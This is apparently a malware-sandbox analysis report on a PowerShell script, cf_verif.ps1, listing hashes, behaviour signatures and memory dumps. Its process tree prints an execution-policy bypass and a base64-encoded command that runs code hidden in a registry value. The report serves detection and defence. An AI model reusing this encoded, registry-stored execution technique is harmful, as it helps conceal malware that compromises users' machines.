Overview

overview

10

Static

static

10

cf_verif.ps1

windows7-x64

8

cf_verif.ps1

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    07/03/2025, 15:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cf_verif.ps1

  • Size

    679B

  • MD5

    1b50d8010aab1860d73255e7857197b6

  • SHA1

    960be1f5e7d05216ce2a1fd8012a7434e1d9c47e

  • SHA256

    b18ed93dd979c6233b1ce6e195338a57243f2a71e6147311aaf06fccea1d20c7

  • SHA512

    af037b5aeb04a96f9af623b3a96baa76ea6b62792a7552cbf5ee7f9ad18f09b0085b8874c1a46ffbc710bca6bc6d2105a70196028fb76bf781b652433c212c40

Score
8/10
execution

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\cf_verif.ps1
    1⤵
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFwAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgAnACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAYAAkAHAAaABhAG4AdABvAG0ALQBmAHIAWgBaAGYAKQA=
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2388

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    d3186f7a0499030cd9862dcfb4b22ccd

    SHA1

    672e0b7f1000d5d892b20d37d023db4f343b39c3

    SHA256

    83637b2ef5d597e130e599bdc2cef7109b3aa4f3c8181bf7a6d43f1db2f26ed6

    SHA512

    fac581545f70a6361cc99da605a17e79a141451eefc9b14685e90e98e7ebe6ed8c8d296a344c534a9ec9bbd464775dc350c19cfc74a7e1cb3f4c6ed8ab90bbbe

    Download Submit

  • memory/2040-4-0x000007FEF5C7E000-0x000007FEF5C7F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2040-5-0x000000001B660000-0x000000001B942000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2040-6-0x00000000021C0000-0x00000000021C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2040-7-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2040-11-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2040-10-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2040-9-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2040-8-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2040-12-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2388-19-0x0000000001F60000-0x0000000001F68000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2388-18-0x000000001B530000-0x000000001B812000-memory.dmp

    Filesize

    2.9MB

    Download